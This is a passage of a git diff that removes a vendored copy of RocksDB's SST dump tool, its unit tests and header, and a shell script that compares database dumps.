-  Env* env = Env::Default();
-  env->DeleteFile(file_name);
-  std::string outfile_name = file_name.substr(0, file_name.length() - 4);
-  outfile_name.append("_dump.txt");
-  env->DeleteFile(outfile_name);
-}
-}  // namespace
-
-// Test for sst dump tool "raw" mode
-class SSTDumpToolTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  SSTDumpToolTest() {}
-
-  ~SSTDumpToolTest() {}
-};
-
-TEST_F(SSTDumpToolTest, EmptyFilter) {
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, FilterBlock) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, true));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, FullFilterBlock) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, GetProperties) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--show_properties");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, CompressedSizes) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=recompress");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as SSTDumpTool is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE  return RUN_ALL_TESTS();
diff --git a/thirdparty/rocksdb/tools/sst_dump_tool.cc b/thirdparty/rocksdb/tools/sst_dump_tool.cc
deleted file mode 100644
index 4dca284..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_tool.cc
+++ /dev/null
@@ -1,689 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "tools/sst_dump_tool_imp.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-#include <map>
-#include <memory>
-#include <sstream>
-#include <vector>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_reader.h"
-#include "util/compression.h"
-#include "util/random.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-SstFileReader::SstFileReader(const std::string& file_path,
-                             bool verify_checksum,
-                             bool output_hex)
-    :file_name_(file_path), read_num_(0), verify_checksum_(verify_checksum),
-    output_hex_(output_hex), ioptions_(options_),
-    internal_comparator_(BytewiseComparator()) {
-  fprintf(stdout, "Process %s\n", file_path.c_str());
-  init_result_ = GetTableReader(file_name_);
-}
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-
-const char* testFileName = "test_file_name";
-
-static const std::vector<std::pair<CompressionType, const char*>>
-    kCompressions = {
-        {CompressionType::kNoCompression, "kNoCompression"},
-        {CompressionType::kSnappyCompression, "kSnappyCompression"},
-        {CompressionType::kZlibCompression, "kZlibCompression"},
-        {CompressionType::kBZip2Compression, "kBZip2Compression"},
-        {CompressionType::kLZ4Compression, "kLZ4Compression"},
-        {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"},
-        {CompressionType::kXpressCompression, "kXpressCompression"},
-        {CompressionType::kZSTD, "kZSTD"}};
-
-Status SstFileReader::GetTableReader(const std::string& file_path) {
-  // Warning about 'magic_number' being uninitialized shows up only in UBsan
-  // builds. Though access is guarded by 's.ok()' checks, fix the issue to
-  // avoid any warnings.
-  uint64_t magic_number = Footer::kInvalidTableMagicNumber;
-
-  // read table magic number
-  Footer footer;
-
-  unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  Status s = options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-  if (s.ok()) {
-    s = options_.env->GetFileSize(file_path, &file_size);
-  }
-
-  file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-
-  if (s.ok()) {
-    s = ReadFooterFromFile(file_.get(), nullptr /* prefetch_buffer */,
-                           file_size, &footer);
-  }
-  if (s.ok()) {
-    magic_number = footer.table_magic_number();
-  }
-
-  if (s.ok()) {
-    if (magic_number == kPlainTableMagicNumber ||
-        magic_number == kLegacyPlainTableMagicNumber) {
-      soptions_.use_mmap_reads = true;
-      options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-      file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-    }
-    options_.comparator = &internal_comparator_;
-    // For old sst format, ReadTableProperties might fail but file can be read
-    if (ReadTableProperties(magic_number, file_.get(), file_size).ok()) {
-      SetTableOptionsByMagicNumber(magic_number);
-    } else {
-      SetOldTableOptions();
-    }
-  }
-
-  if (s.ok()) {
-    s = NewTableReader(ioptions_, soptions_, internal_comparator_, file_size,
-                       &table_reader_);
-  }
-  return s;
-}
-
-Status SstFileReader::NewTableReader(
-    const ImmutableCFOptions& ioptions, const EnvOptions& soptions,
-    const InternalKeyComparator& internal_comparator, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader) {
-  // We need to turn off pre-fetching of index and filter nodes for
-  // BlockBasedTable
-  if (BlockBasedTableFactory::kName == options_.table_factory->Name()) {
-    return options_.table_factory->NewTableReader(
-        TableReaderOptions(ioptions_, soptions_, internal_comparator_,
-                           /*skip_filters=*/false),
-        std::move(file_), file_size, &table_reader_, /*enable_prefetch=*/false);
-  }
-
-  // For all other factory implementation
-  return options_.table_factory->NewTableReader(
-      TableReaderOptions(ioptions_, soptions_, internal_comparator_),
-      std::move(file_), file_size, &table_reader_);
-}
-
-Status SstFileReader::VerifyChecksum() {
-  return table_reader_->VerifyChecksum();
-}
-
-Status SstFileReader::DumpTable(const std::string& out_filename) {
-  unique_ptr<WritableFile> out_file;
-  Env* env = Env::Default();
-  env->NewWritableFile(out_filename, &out_file, soptions_);
-  Status s = table_reader_->DumpTable(out_file.get());
-  out_file->Close();
-  return s;
-}
-
-uint64_t SstFileReader::CalculateCompressedTableSize(
-    const TableBuilderOptions& tb_options, size_t block_size) {
-  unique_ptr<WritableFile> out_file;
-  unique_ptr<Env> env(NewMemEnv(Env::Default()));
-  env->NewWritableFile(testFileName, &out_file, soptions_);
-  unique_ptr<WritableFileWriter> dest_writer;
-  dest_writer.reset(new WritableFileWriter(std::move(out_file), soptions_));
-  BlockBasedTableOptions table_options;
-  table_options.block_size = block_size;
-  BlockBasedTableFactory block_based_tf(table_options);
-  unique_ptr<TableBuilder> table_builder;
-  table_builder.reset(block_based_tf.NewTableBuilder(
-      tb_options,
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      dest_writer.get()));
-  unique_ptr<InternalIterator> iter(table_reader_->NewIterator(ReadOptions()));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    if (!iter->status().ok()) {
-      fputs(iter->status().ToString().c_str(), stderr);
-      exit(1);
-    }
-    table_builder->Add(iter->key(), iter->value());
-  }
-  Status s = table_builder->Finish();
-  if (!s.ok()) {
-    fputs(s.ToString().c_str(), stderr);
-    exit(1);
-  }
-  uint64_t size = table_builder->FileSize();
-  env->DeleteFile(testFileName);
-  return size;
-}
-
-int SstFileReader::ShowAllCompressionSizes(
-    size_t block_size,
-    const std::vector<std::pair<CompressionType, const char*>>&
-        compression_types) {
-  ReadOptions read_options;
-  Options opts;
-  const ImmutableCFOptions imoptions(opts);
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-      block_based_table_factories;
-
-  fprintf(stdout, "Block Size: %" ROCKSDB_PRIszt "\n", block_size);
-
-  for (auto& i : compression_types) {
-    if (CompressionTypeSupported(i.first)) {
-      CompressionOptions compress_opt;
-      std::string column_family_name;
-      int unknown_level = -1;
-      TableBuilderOptions tb_opts(imoptions, ikc, &block_based_table_factories,
-                                  i.first, compress_opt,
-                                  nullptr /* compression_dict */,
-                                  false /* skip_filters */, column_family_name,
-                                  unknown_level);
-      uint64_t file_size = CalculateCompressedTableSize(tb_opts, block_size);
-      fprintf(stdout, "Compression: %s", i.second);
-      fprintf(stdout, " Size: %" PRIu64 "\n", file_size);
-    } else {
-      fprintf(stdout, "Unsupported compression type: %s.\n", i.second);
-    }
-  }
-  return 0;
-}
-
-Status SstFileReader::ReadTableProperties(uint64_t table_magic_number,
-                                          RandomAccessFileReader* file,
-                                          uint64_t file_size) {
-  TableProperties* table_properties = nullptr;
-  Status s = rocksdb::ReadTableProperties(file, file_size, table_magic_number,
-                                          ioptions_, &table_properties);
-  if (s.ok()) {
-    table_properties_.reset(table_properties);
-  } else {
-    fprintf(stdout, "Not able to read table properties\n");
-  }
-  return s;
-}
-
-Status SstFileReader::SetTableOptionsByMagicNumber(
-    uint64_t table_magic_number) {
-  assert(table_properties_);
-  if (table_magic_number == kBlockBasedTableMagicNumber ||
-      table_magic_number == kLegacyBlockBasedTableMagicNumber) {
-    options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-    fprintf(stdout, "Sst file format: block-based\n");
-    auto& props = table_properties_->user_collected_properties;
-    auto pos = props.find(BlockBasedTablePropertyNames::kIndexType);
-    if (pos != props.end()) {
-      auto index_type_on_file = static_cast<BlockBasedTableOptions::IndexType>(
-          DecodeFixed32(pos->second.c_str()));
-      if (index_type_on_file ==
-          BlockBasedTableOptions::IndexType::kHashSearch) {
-        options_.prefix_extractor.reset(NewNoopTransform());
-      }
-    }
-  } else if (table_magic_number == kPlainTableMagicNumber ||
-             table_magic_number == kLegacyPlainTableMagicNumber) {
-    options_.allow_mmap_reads = true;
-
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = kPlainTableVariableLength;
-    plain_table_options.bloom_bits_per_key = 0;
-    plain_table_options.hash_table_ratio = 0;
-    plain_table_options.index_sparseness = 1;
-    plain_table_options.huge_page_tlb_size = 0;
-    plain_table_options.encoding_type = kPlain;
-    plain_table_options.full_scan_mode = true;
-
-    options_.table_factory.reset(NewPlainTableFactory(plain_table_options));
-    fprintf(stdout, "Sst file format: plain table\n");
-  } else {
-    char error_msg_buffer[80];
-    snprintf(error_msg_buffer, sizeof(error_msg_buffer) - 1,
-             "Unsupported table magic number --- %lx",
-             (long)table_magic_number);
-    return Status::InvalidArgument(error_msg_buffer);
-  }
-
-  return Status::OK();
-}
-
-Status SstFileReader::SetOldTableOptions() {
-  assert(table_properties_ == nullptr);
-  options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-  fprintf(stdout, "Sst file format: block-based(old version)\n");
-
-  return Status::OK();
-}
-
-Status SstFileReader::ReadSequential(bool print_kv, uint64_t read_num,
-                                     bool has_from, const std::string& from_key,
-                                     bool has_to, const std::string& to_key,
-                                     bool use_from_as_prefix) {
-  if (!table_reader_) {
-    return init_result_;
-  }
-
-  InternalIterator* iter =
-      table_reader_->NewIterator(ReadOptions(verify_checksum_, false));
-  uint64_t i = 0;
-  if (has_from) {
-    InternalKey ikey;
-    ikey.SetMaxPossibleForUserKey(from_key);
-    iter->Seek(ikey.Encode());
-  } else {
-    iter->SeekToFirst();
-  }
-  for (; iter->Valid(); iter->Next()) {
-    Slice key = iter->key();
-    Slice value = iter->value();
-    ++i;
-    if (read_num > 0 && i > read_num)
-      break;
-
-    ParsedInternalKey ikey;
-    if (!ParseInternalKey(key, &ikey)) {
-      std::cerr << "Internal Key ["
-                << key.ToString(true /* in hex*/)
-                << "] parse error!\n";
-      continue;
-    }
-
-    // the key returned is not prefixed with out 'from' key
-    if (use_from_as_prefix && !ikey.user_key.starts_with(from_key)) {
-      break;
-    }
-
-    // If end marker was specified, we stop before it
-    if (has_to && BytewiseComparator()->Compare(ikey.user_key, to_key) >= 0) {
-      break;
-    }
-
-    if (print_kv) {
-      fprintf(stdout, "%s => %s\n",
-          ikey.DebugString(output_hex_).c_str(),
-          value.ToString(output_hex_).c_str());
-    }
-  }
-
-  read_num_ += i;
-
-  Status ret = iter->status();
-  delete iter;
-  return ret;
-}
-
-Status SstFileReader::ReadTableProperties(
-    std::shared_ptr<const TableProperties>* table_properties) {
-  if (!table_reader_) {
-    return init_result_;
-  }
-
-  *table_properties = table_reader_->GetTableProperties();
-  return init_result_;
-}
-
-namespace {
-
-void print_help() {
-  fprintf(stderr,
-          R"(sst_dump --file=<data_dir_OR_sst_file> [--command=check|scan|raw]
-    --file=<data_dir_OR_sst_file>
-      Path to SST file or directory containing SST files
-
-    --command=check|scan|raw|verify
-        check: Iterate over entries in files but dont print anything except if an error is encounterd (default command)
-        scan: Iterate over entries in files and print them to screen
-        raw: Dump all the table contents to <file_name>_dump.txt
-        verify: Iterate all the blocks in files verifying checksum to detect possible coruption but dont print anything except if a corruption is encountered
-        recompress: reports the SST file size if recompressed with different
-                    compression types
-
-    --output_hex
-      Can be combined with scan command to print the keys and values in Hex
-
-    --from=<user_key>
-      Key to start reading from when executing check|scan
-
-    --to=<user_key>
-      Key to stop reading at when executing check|scan
-
-    --prefix=<user_key>
-      Returns all keys with this prefix when executing check|scan
-      Cannot be used in conjunction with --from
-
-    --read_num=<num>
-      Maximum number of entries to read when executing check|scan
-
-    --verify_checksum
-      Verify file checksum when executing check|scan
-
-    --input_key_hex
-      Can be combined with --from and --to to indicate that these values are encoded in Hex
-
-    --show_properties
-      Print table properties after iterating over the file when executing
-      check|scan|raw
-
-    --set_block_size=<block_size>
-      Can be combined with --command=recompress to set the block size that will
-      be used when trying different compression algorithms
-
-    --compression_types=<comma-separated list of CompressionType members, e.g.,
-      kSnappyCompression>
-      Can be combined with --command=recompress to run recompression for this
-      list of compression types
-
-    --parse_internal_key=<0xKEY>
-      Convenience option to parse an internal key on the command line. Dumps the
-      internal key in hex format {'key' @ SN: type}
-)");
-}
-
-}  // namespace
-
-int SSTDumpTool::Run(int argc, char** argv) {
-  const char* dir_or_file = nullptr;
-  uint64_t read_num = -1;
-  std::string command;
-
-  char junk;
-  uint64_t n;
-  bool verify_checksum = false;
-  bool output_hex = false;
-  bool input_key_hex = false;
-  bool has_from = false;
-  bool has_to = false;
-  bool use_from_as_prefix = false;
-  bool show_properties = false;
-  bool show_summary = false;
-  bool set_block_size = false;
-  std::string from_key;
-  std::string to_key;
-  std::string block_size_str;
-  size_t block_size;
-  std::vector<std::pair<CompressionType, const char*>> compression_types;
-  uint64_t total_num_files = 0;
-  uint64_t total_num_data_blocks = 0;
-  uint64_t total_data_block_size = 0;
-  uint64_t total_index_block_size = 0;
-  uint64_t total_filter_block_size = 0;
-  for (int i = 1; i < argc; i++) {
-    if (strncmp(argv[i], "--file=", 7) == 0) {
-      dir_or_file = argv[i] + 7;
-    } else if (strcmp(argv[i], "--output_hex") == 0) {
-      output_hex = true;
-    } else if (strcmp(argv[i], "--input_key_hex") == 0) {
-      input_key_hex = true;
-    } else if (sscanf(argv[i],
-               "--read_num=%lu%c",
-               (unsigned long*)&n, &junk) == 1) {
-      read_num = n;
-    } else if (strcmp(argv[i], "--verify_checksum") == 0) {
-      verify_checksum = true;
-    } else if (strncmp(argv[i], "--command=", 10) == 0) {
-      command = argv[i] + 10;
-    } else if (strncmp(argv[i], "--from=", 7) == 0) {
-      from_key = argv[i] + 7;
-      has_from = true;
-    } else if (strncmp(argv[i], "--to=", 5) == 0) {
-      to_key = argv[i] + 5;
-      has_to = true;
-    } else if (strncmp(argv[i], "--prefix=", 9) == 0) {
-      from_key = argv[i] + 9;
-      use_from_as_prefix = true;
-    } else if (strcmp(argv[i], "--show_properties") == 0) {
-      show_properties = true;
-    } else if (strcmp(argv[i], "--show_summary") == 0) {
-      show_summary = true;
-    } else if (strncmp(argv[i], "--set_block_size=", 17) == 0) {
-      set_block_size = true;
-      block_size_str = argv[i] + 17;
-      std::istringstream iss(block_size_str);
-      iss >> block_size;
-      if (iss.fail()) {
-        fprintf(stderr, "block size must be numeric\n");
-        exit(1);
-      }
-    } else if (strncmp(argv[i], "--compression_types=", 20) == 0) {
-      std::string compression_types_csv = argv[i] + 20;
-      std::istringstream iss(compression_types_csv);
-      std::string compression_type;
-      while (std::getline(iss, compression_type, ',')) {
-        auto iter = std::find_if(
-            kCompressions.begin(), kCompressions.end(),
-            [&compression_type](std::pair<CompressionType, const char*> curr) {
-              return curr.second == compression_type;
-            });
-        if (iter == kCompressions.end()) {
-          fprintf(stderr, "%s is not a valid CompressionType\n",
-                  compression_type.c_str());
-          exit(1);
-        }
-        compression_types.emplace_back(*iter);
-      }
-    } else if (strncmp(argv[i], "--parse_internal_key=", 21) == 0) {
-      std::string in_key(argv[i] + 21);
-      try {
-        in_key = rocksdb::LDBCommand::HexToString(in_key);
-      } catch (...) {
-        std::cerr << "ERROR: Invalid key input '"
-          << in_key
-          << "' Use 0x{hex representation of internal rocksdb key}" << std::endl;
-        return -1;
-      }
-      Slice sl_key = rocksdb::Slice(in_key);
-      ParsedInternalKey ikey;
-      int retc = 0;
-      if (!ParseInternalKey(sl_key, &ikey)) {
-        std::cerr << "Internal Key [" << sl_key.ToString(true /* in hex*/)
-                  << "] parse error!\n";
-        retc = -1;
-      }
-      fprintf(stdout, "key=%s\n", ikey.DebugString(true).c_str());
-      return retc;
-    } else {
-      fprintf(stderr, "Unrecognized argument '%s'\n\n", argv[i]);
-      print_help();
-      exit(1);
-    }
-  }
-
-  if (use_from_as_prefix && has_from) {
-    fprintf(stderr, "Cannot specify --prefix and --from\n\n");
-    exit(1);
-  }
-
-  if (input_key_hex) {
-    if (has_from || use_from_as_prefix) {
-      from_key = rocksdb::LDBCommand::HexToString(from_key);
-    }
-    if (has_to) {
-      to_key = rocksdb::LDBCommand::HexToString(to_key);
-    }
-  }
-
-  if (dir_or_file == nullptr) {
-    fprintf(stderr, "file or directory must be specified.\n\n");
-    print_help();
-    exit(1);
-  }
-
-  std::vector<std::string> filenames;
-  rocksdb::Env* env = rocksdb::Env::Default();
-  rocksdb::Status st = env->GetChildren(dir_or_file, &filenames);
-  bool dir = true;
-  if (!st.ok()) {
-    filenames.clear();
-    filenames.push_back(dir_or_file);
-    dir = false;
-  }
-
-  fprintf(stdout, "from [%s] to [%s]\n",
-      rocksdb::Slice(from_key).ToString(true).c_str(),
-      rocksdb::Slice(to_key).ToString(true).c_str());
-
-  uint64_t total_read = 0;
-  for (size_t i = 0; i < filenames.size(); i++) {
-    std::string filename = filenames.at(i);
-    if (filename.length() <= 4 ||
-        filename.rfind(".sst") != filename.length() - 4) {
-      // ignore
-      continue;
-    }
-    if (dir) {
-      filename = std::string(dir_or_file) + "/" + filename;
-    }
-
-    rocksdb::SstFileReader reader(filename, verify_checksum,
-                                  output_hex);
-    if (!reader.getStatus().ok()) {
-      fprintf(stderr, "%s: %s\n", filename.c_str(),
-              reader.getStatus().ToString().c_str());
-      continue;
-    }
-
-    if (command == "recompress") {
-      reader.ShowAllCompressionSizes(
-          set_block_size ? block_size : 16384,
-          compression_types.empty() ? kCompressions : compression_types);
-      return 0;
-    }
-
-    if (command == "raw") {
-      std::string out_filename = filename.substr(0, filename.length() - 4);
-      out_filename.append("_dump.txt");
-
-      st = reader.DumpTable(out_filename);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(), st.ToString().c_str());
-        exit(1);
-      } else {
-        fprintf(stdout, "raw dump written to file %s\n", &out_filename[0]);
-      }
-      continue;
-    }
-
-    // scan all files in give file path.
-    if (command == "" || command == "scan" || command == "check") {
-      st = reader.ReadSequential(
-          command == "scan", read_num > 0 ? (read_num - total_read) : read_num,
-          has_from || use_from_as_prefix, from_key, has_to, to_key,
-          use_from_as_prefix);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(),
-            st.ToString().c_str());
-      }
-      total_read += reader.GetReadNumber();
-      if (read_num > 0 && total_read > read_num) {
-        break;
-      }
-    }
-
-    if (command == "verify") {
-      st = reader.VerifyChecksum();
-      if (!st.ok()) {
-        fprintf(stderr, "%s is corrupted: %s\n", filename.c_str(),
-                st.ToString().c_str());
-      } else {
-        fprintf(stdout, "The file is ok\n");
-      }
-      continue;
-    }
-
-    if (show_properties || show_summary) {
-      const rocksdb::TableProperties* table_properties;
-
-      std::shared_ptr<const rocksdb::TableProperties>
-          table_properties_from_reader;
-      st = reader.ReadTableProperties(&table_properties_from_reader);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(), st.ToString().c_str());
-        fprintf(stderr, "Try to use initial table properties\n");
-        table_properties = reader.GetInitTableProperties();
-      } else {
-        table_properties = table_properties_from_reader.get();
-      }
-      if (table_properties != nullptr) {
-        if (show_properties) {
-          fprintf(stdout,
-                  "Table Properties:\n"
-                  "------------------------------\n"
-                  "  %s",
-                  table_properties->ToString("\n  ", ": ").c_str());
-          fprintf(stdout, "# deleted keys: %" PRIu64 "\n",
-                  rocksdb::GetDeletedKeys(
-                      table_properties->user_collected_properties));
-
-          bool property_present;
-          uint64_t merge_operands = rocksdb::GetMergeOperands(
-              table_properties->user_collected_properties, &property_present);
-          if (property_present) {
-            fprintf(stdout, "  # merge operands: %" PRIu64 "\n",
-                    merge_operands);
-          } else {
-            fprintf(stdout, "  # merge operands: UNKNOWN\n");
-          }
-        }
-        total_num_files += 1;
-        total_num_data_blocks += table_properties->num_data_blocks;
-        total_data_block_size += table_properties->data_size;
-        total_index_block_size += table_properties->index_size;
-        total_filter_block_size += table_properties->filter_size;
-      }
-      if (show_properties) {
-        fprintf(stdout,
-                "Raw user collected properties\n"
-                "------------------------------\n");
-        for (const auto& kv : table_properties->user_collected_properties) {
-          std::string prop_name = kv.first;
-          std::string prop_val = Slice(kv.second).ToString(true);
-          fprintf(stdout, "  # %s: 0x%s\n", prop_name.c_str(),
-                  prop_val.c_str());
-        }
-      }
-    }
-  }
-  if (show_summary) {
-    fprintf(stdout, "total number of files: %" PRIu64 "\n", total_num_files);
-    fprintf(stdout, "total number of data blocks: %" PRIu64 "\n",
-            total_num_data_blocks);
-    fprintf(stdout, "total data block size: %" PRIu64 "\n",
-            total_data_block_size);
-    fprintf(stdout, "total index block size: %" PRIu64 "\n",
-            total_index_block_size);
-    fprintf(stdout, "total filter block size: %" PRIu64 "\n",
-            total_filter_block_size);
-  }
-  return 0;
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/sst_dump_tool_imp.h b/thirdparty/rocksdb/tools/sst_dump_tool_imp.h
deleted file mode 100644
index 9531b54..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_tool_imp.h
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/sst_dump_tool.h"
-
-#include <memory>
-#include <string>
-#include "db/dbformat.h"
-#include "options/cf_options.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class SstFileReader {
- public:
-  explicit SstFileReader(const std::string& file_name, bool verify_checksum,
-                         bool output_hex);
-
-  Status ReadSequential(bool print_kv, uint64_t read_num, bool has_from,
-                        const std::string& from_key, bool has_to,
-                        const std::string& to_key,
-                        bool use_from_as_prefix = false);
-
-  Status ReadTableProperties(
-      std::shared_ptr<const TableProperties>* table_properties);
-  uint64_t GetReadNumber() { return read_num_; }
-  TableProperties* GetInitTableProperties() { return table_properties_.get(); }
-
-  Status VerifyChecksum();
-  Status DumpTable(const std::string& out_filename);
-  Status getStatus() { return init_result_; }
-
-  int ShowAllCompressionSizes(
-      size_t block_size,
-      const std::vector<std::pair<CompressionType, const char*>>&
-          compression_types);
-
- private:
-  // Get the TableReader implementation for the sst file
-  Status GetTableReader(const std::string& file_path);
-  Status ReadTableProperties(uint64_t table_magic_number,
-                             RandomAccessFileReader* file, uint64_t file_size);
-
-  uint64_t CalculateCompressedTableSize(const TableBuilderOptions& tb_options,
-                                        size_t block_size);
-
-  Status SetTableOptionsByMagicNumber(uint64_t table_magic_number);
-  Status SetOldTableOptions();
-
-  // Helper function to call the factory with settings specific to the
-  // factory implementation
-  Status NewTableReader(const ImmutableCFOptions& ioptions,
-                        const EnvOptions& soptions,
-                        const InternalKeyComparator& internal_comparator,
-                        uint64_t file_size,
-                        unique_ptr<TableReader>* table_reader);
-
-  std::string file_name_;
-  uint64_t read_num_;
-  bool verify_checksum_;
-  bool output_hex_;
-  EnvOptions soptions_;
-
-  // options_ and internal_comparator_ will also be used in
-  // ReadSequential internally (specifically, seek-related operations)
-  Options options_;
-
-  Status init_result_;
-  unique_ptr<TableReader> table_reader_;
-  unique_ptr<RandomAccessFileReader> file_;
-
-  const ImmutableCFOptions ioptions_;
-  InternalKeyComparator internal_comparator_;
-  unique_ptr<TableProperties> table_properties_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/verify_random_db.sh b/thirdparty/rocksdb/tools/verify_random_db.sh
deleted file mode 100755
index 7000f5a..0000000
--- a/thirdparty/rocksdb/tools/verify_random_db.sh
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to verify DB generated by generate_random_db.sh cannot opened and read correct data.
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> <DB Path>
-
-scriptpath=`dirname $BASH_SOURCE`
-if [ "$#" -lt 2 ]; then
-  echo "usage: $BASH_SOURCE <db_directory> <compare_base_db_directory> [dump_file_name] [if_try_load_options]"
-  exit 1
-fi
-
-db_dir=$1
-base_db_dir=$2
-dump_file_name=${3:-"dump_file.txt"}
-try_load_options=${4:-"1"}
-db_dump=$db_dir"/"$dump_file_name
-base_db_dump=$base_db_dir"/"$dump_file_name
-extra_param=
-
-if [ "$try_load_options" = "1" ]; then
- extra_param=" --try_load_options "
-fi
-
-set -e
-echo == Dumping data from $db_dir to $db_dump
-./ldb dump --db=$db_dir $extra_param > $db_dump
-
-echo == Dumping data from $base_db_dir to $base_db_dump
-./ldb dump --db=$base_db_dir $extra_param > $base_db_dump
-
-diff $db_dump $base_db_dir
diff --git a/thirdparty/rocksdb/tools/write_stress.cc b/thirdparty/rocksdb/tools/write_stress.cc
deleted file mode 100644
index e5e4204..0000000
--- a/thirdparty/rocksdb/tools/write_stress.cc
